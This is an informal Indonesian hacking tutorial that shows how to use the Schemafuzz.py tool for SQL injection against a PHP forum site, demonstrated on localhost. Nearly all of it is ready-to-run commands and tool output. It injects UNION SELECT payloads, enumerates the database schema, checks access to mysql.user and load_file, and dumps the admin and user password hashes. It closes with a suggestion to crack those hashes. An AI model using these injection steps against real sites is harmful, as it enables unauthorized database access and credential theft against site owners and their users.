Schemafuzz.py

Download Disini

Kayak'a yg laen udah pda tau hek2an pke cara Schemafuzz.py ini...tpii kgak papa dah buat yg blum tau...

Schemafuzz.py dibuat dengan menggunakan bahasa python(bukan python yg di maksud uler yg ada di pilem ntu).
Fungsi dari Schemafuzz.py ntu untuk biar ente mudah nemuin tabel dan kolom pada database sql....
langsung ajj dah kgak udah lama2 yak … Liat baek-baek :

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help Trus kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama :
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!

langkah kedua :
--------------
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]
[-] Total URL Requests 618
[-] Done

langkah ketiga :
---------------
klau udah nemu nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33

[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]
[-] Total URL Requests 270
[-] Done

biar kita tau apa bisa load_file dalam site ntu pake rumus ini..
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

Tar bakalan tampil seperti ini...
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

Untuk mengetahui beberapa database yang terdapat pada site tersebut, cba pke rumusi ini...

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

langkah selanjutnya (awas salah langkah)
--------------------
cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini....

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password

Keluar dah user ama passwordnya...
Hasilnya dibawah ini....

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

Jangan lupa untuk ngecek schemafuzzlog.txt nya
setelah itu tinggal kita crack passwordnya pake program md5,md6,md7,md8,md9,md10 atau apa lah.....

Nb :
cara diatas mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan tebak2 sndrii aja tabel ama kolomnya....